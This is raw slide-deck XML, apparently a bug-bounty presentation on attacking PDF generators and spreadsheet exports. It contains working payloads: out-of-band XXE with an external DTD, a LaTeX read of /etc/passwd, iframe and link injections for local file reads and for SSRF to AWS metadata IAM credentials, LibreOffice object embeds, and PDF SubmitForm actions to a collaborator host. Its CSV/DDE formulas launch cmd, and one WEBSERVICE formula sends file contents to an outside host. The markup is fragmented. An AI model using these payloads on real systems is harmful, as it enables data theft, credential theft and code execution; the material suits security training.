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Source Code Pro"/>
      <p:regular r:id="rId24"/>
      <p:bold r:id="rId25"/>
      <p:italic r:id="rId26"/>
      <p:boldItalic r:id="rId27"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Arial Black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SourceCodePr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ourceCodePro-italic.fntdata"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePro-bold.fntdata"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/ArialBlack-regular.fntdata"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/SourceCodePr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3c7f3a5f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3c7f3a5f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ab89528574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ab89528574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b89528574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ab89528574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ab8952857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ab8952857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3c7f3a5f1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3c7f3a5f1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b8952857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ab8952857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b8952857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ab8952857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b8952857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ab8952857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ab89528574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ab89528574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b89528574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b89528574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b47deaa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b47deaa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b8952857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ab8952857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ab89528574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ab8952857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hyperlink" Target="https://medium.com/@mrnikhilsri/oob-xxe-in-prizmdoc-cve-2018-15805-dfb1e474345c" TargetMode="External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hyperlink" Target="https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a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github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection" TargetMode="External"/><Relationship Id="rId7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jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://twitter.com/hackerscrolls/status/1262676000665751552" TargetMode="External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o-tL9ULF0KI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o-tL9ULF0KI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hyperlink" Target="https://blog.dixitaditya.com/leveraging-xss-to-read-internal-files/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@armaanpathan/pdfreacter-ssrf-to-root-level-local-file-read-which-led-to-rce-eb460ffb3129" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@inonst/export-injection-2eebc4f1711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blog.appsecco.com/finding-ssrf-via-html-injection-inside-a-pdf-file-on-aws-ec2-214cc5ec5d90" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://rohit-soni.medium.com/story-behind-sweet-ssrf-40c705f13053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www.youtube.com/watch?v=o-tL9ULF0KI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blog.appsecco.com/server-side-request-forgery-via-html-injection-in-pdf-download-90ee4053e91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buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/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r4id3n.medium.com/ssrf-exploitation-in-spreedsheet-to-pdf-converter-2c7eacdac781" TargetMode="External"/><Relationship Id="rId7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buer.haus/2019/10/18/a-tale-of-exploitation-in-spreadsheet-file-conversions/" TargetMode="External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hyperlink" Target="https://www.youtube.com/watch?v=Sz-zEDNTe8U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i.blackhat.com/eu-20/Thursday/eu-20-Heyes-Portable-Data-ExFiltration-XSS-For-PDFs.pdf" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/research/portable-data-exfiltration" TargetMode="External"/><Relationship Id="rId8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blog.securelayer7.net/how-to-perform-csv-excel-macro-injection/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7.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/92353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s://hackerone.com/reports/111192" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackerone.com/reports/146593" TargetMode="External"/><Relationship Id="rId10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hyperlink" Target="https://notsosecure.com/data-exfiltration-formula-injection/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://payatu.com/csv-injection-basic-to-exploit" TargetMode="External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File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Generation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4" name="Google Shape;204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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4524900" y="2779725"/>
            <a:ext cx="4296900" cy="430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                 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Download Your Information</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="EFEFEF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Google Shape;206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82300" y="2823225"/>
            <a:ext cx="490749" cy="3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Download XML Content As PDF , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject XXE Payloads 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&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE a [ &lt;!ENTITY % asd SYSTEM "http://me.com/evil.dtd"&gt; %asd; %c;]&gt;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OOB XXE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2" name="Google Shape;332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application/xml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name=me&amp;code=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;&lt;!DOCTYPE a [ &lt;!ENTITY % asd SYSTEM "http://me.com/evil.dtd"&gt; %asd; %c;]&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;fileTYPE=xml-to-pdf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33" name="Google Shape;333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4" name="Google Shape;334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6" name="Google Shape;33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8" name="Google Shape;338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Write Latex Code To Convert It To PDF , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject Latex Payloads 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\newread\file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\openin\file=/etc/passwd\loop\unless\ifeof\file\read\file to\fileline\text{\fileline}\repeat\closein\file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4" name="Google Shape;344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name=me&amp;code=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\newread\file\openin\file=/etc/passwd\loop\unless\ifeof\file\read\fileto\fileline\text{\fileline}\repeat\closein\file</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;fileTYPE=latex-to-pdf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5" name="Google Shape;345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6" name="Google Shape;346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8" name="Google Shape;34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0" name="Google Shape;350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Payloads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2" name="Google Shape;352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100363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50" y="-50225"/>
            <a:ext cx="9332899" cy="5249756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51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-165000" y="4641350"/>
            <a:ext cx="9426300" cy="5883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   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3049000" y="4696788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60" name="Google Shape;36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725512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2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2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7" name="Google Shape;367;p52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68" name="Google Shape;36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2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2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PDF Generation Process , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject Blind XSS Payloads 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&lt;img src="http://me:80"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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&lt;style&gt;&lt;iframe src="http://me:80"&gt;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Figure Out There Is HTML Rendering OR Not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12" name="Google Shape;212;p4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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;img src="http://me:80"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address=egy&amp;fileTYPE=pdf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13" name="Google Shape;213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18" name="Google Shape;2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PDF Generation Process , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject LFI Payloads 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&lt;link rel=attachment href="file:///etc/passwd"&gt;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&lt;script&gt;document.write('&lt;iframe src=file:///etc/passwd&gt;&lt;/iframe&gt;');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&lt;/script&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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4" name="Google Shape;224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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;link rel=attachment href="file:///etc/passwd"&gt;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&amp;address=egy&amp;fileTYPE=pdf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5" name="Google Shape;225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6" name="Google Shape;236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PDF Generation Process , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject Blind XSS Payloads With IP 169.254.169.254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"&gt;&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src="</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://169.254.169.254/latest/meta-data/iam/security-credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;/iframe&gt;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Read The AWS IAM role name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2" name="Google Shape;242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>
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;&lt;iframe src="http://169.254.169.254/latest/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meta-data/iam/security-credentials"&gt;&lt;/iframe&gt;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address=egy&amp;fileTYPE=pdf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6" name="Google Shape;24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0" name="Google Shape;25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3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3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939538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PDF Generation Process Based On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LibreOffice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OpenOffice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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject Payloads e.g. &lt;draw:object xlink:href="https://me.com/file" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/&gt;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Read Local Files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0" name="Google Shape;260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/downloadDATA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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;draw:frame draw:style-name="fr1" draw:name="Object1" text:anchor-type="paragraph" svg:width="6.6925in" svg:height="1.1791in" draw:z-index="0"&gt;&lt;draw:object xlink:href="file:///etc/passwd" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/&gt;&lt;draw:image xlink:href="./ObjectReplacements/Object 1" xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/&gt;&lt;/draw:frame&gt;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&amp;address=egy&amp;fileTYPE=pdf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2" name="Google Shape;262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4" name="Google Shape;26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68" name="Google Shape;268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PDF Generation Process Based On </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LibreOffice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OpenOffice </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Try To Inject Payloads e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;text:section-source xlink:href="http://169.254.169.254/latest/meta-data/ xlink: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type="simple" xlink:show="embed" xlink:actuate="onLoad"/&gt;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Read</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1700">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> The Meta Data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4" name="Google Shape;27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/downloadDATA HTTP/1.1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name=</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;office:text&gt;&lt;text:section text:name="string"&gt;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&lt;text:section-source xlink:href="http://169.254.169.254/latest/meta-data/ xlink:type="simple" xlink:show="embed" xlink:actuate="onLoad"/&gt;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</a:rPr>
              <a:t> &lt;/text:section&gt;&lt;/office:text&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address=egy&amp;fileTYPE=pdf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75" name="Google Shape;275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6" name="Google Shape;276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8" name="Google Shape;27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0" name="Google Shape;28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6" name="Google Shape;286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Payloads Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou Must </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use Its If There Is PDF Generation Bases On Input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8" name="Google Shape;28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6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0" name="Google Shape;290;p46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1" name="Google Shape;291;p46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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/JS(app.alert(1);)/Type/Action&gt;&gt;/&gt;&gt;(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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/JS(app.alert(1);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this.submitForm({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cURL: 'https://id.burpcollaborator.net',cSubmitAs: 'PDF'}))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/Type/Action&gt;&gt;/&gt;&gt;(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/blah)&gt;&gt;/A&lt;&lt;/S/SubmitForm/Flags 256/F(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https://id.burpcollaborator.net)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/Type/Action&gt;&gt;/&gt;&gt;(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/blah)&gt;&gt;/A&lt;&lt;/S/JavaScript/JS(app.alert(1)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/)/S/JavaScript/JS(app.alert(1)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 /) &gt;&gt; &gt;&gt;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&lt;&lt;/Type /Annot /Subtype /Link /Rect [0.00 813.54 566.93 -298.27] /Border [0 0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00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0] /A &lt;&lt;/S/SubmitForm/Flags 0/F(https://id.burpcollaborator.net</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="900">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="292" name="Google Shape;292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425" y="3271200"/>
            <a:ext cx="457600" cy="4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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258050" y="24585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94" name="Google Shape;294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400" y="2408775"/>
            <a:ext cx="593650" cy="46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5625" y="28897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Export Your Data As Spreadsheet Files , </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject CSV Payloads e.g.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=sum(10+10) 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=cmd|' /C calc'!A0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DDE ("cmd";"/C calc";"!A0")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>
                <a:solidFill>
                  <a:srgbClr val="0B5394"/>
                </a:solidFill>
              </a:rPr>
              <a:t> @SUM(1+1)*cmd|' /C calc'!A0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1" name="Google Shape;301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/downloadDATA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name=me</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=cmd|' /C calc'!A0</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="EFEFEF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp;address=egy&amp;fileTYPE=csv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02" name="Google Shape;302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05" name="Google Shape;30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7" name="Google Shape;30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9" name="Google Shape;309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91500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1" name="Google Shape;311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7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9" name="Google Shape;319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List Of CSV Payloads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8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3" name="Google Shape;323;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252625" y="327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313" y="332553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8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950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="600">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="en" sz="950">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HYPERLINK("https://me.com", "ME")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=cmd|' /C notepad'!'A1'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=cmd|' /C ping IP-Of-Me'!'A1'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='file:///etc/passwd'#$passwd.A1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=WEBSERVICE(CONCATENATE("http://me.com/",('file:///etc/passwd'#$passwd.A1)))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rgbClr val="00FF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="326" name="Google Shape;326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6725" y="29061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